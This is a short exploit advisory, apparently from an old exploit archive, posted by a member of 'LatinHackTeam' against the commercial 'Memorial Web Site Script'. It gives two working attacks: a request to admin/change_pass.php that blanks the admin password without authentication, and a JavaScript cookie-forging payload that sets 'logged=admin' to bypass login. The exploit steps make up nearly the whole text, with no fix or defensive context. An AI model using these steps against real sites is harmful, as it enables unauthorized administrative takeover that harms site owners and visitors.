-----------------------------------------------------------------------
Memorial Web Site Script --> Reset Password & Insecure Cookie Handling
-----------------------------------------------------------------------
Author : Chip D3 Bi0s
Email : chipdebios[alt+64]gmail.com
Where : From Remote
Group : LatinHackTeam
Affected software description:~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Memorial Web Site Script
Author : Easy Scripts
Price : $49
Vendor : http://www.easy-scripts.net
description Bug:~~~~~~~~~~~~~~~
To reset the password just use this:
http://127.0.0.1/[path]/admin/change_pass.php
so the password will be null, login with single user can
admin:
http://127.0.0.1/[path]/admin/--------------------------
Insecure Cookie Handling
exploit:
javascript:document.cookie="logged=admin;path=/";
http://127.0.0.1/[path]/admin/--------------------------+++++++++++++++++++++++++++++++++++++++#[!] Produced in South America+++++++++++++++++++++++++++++++++++++++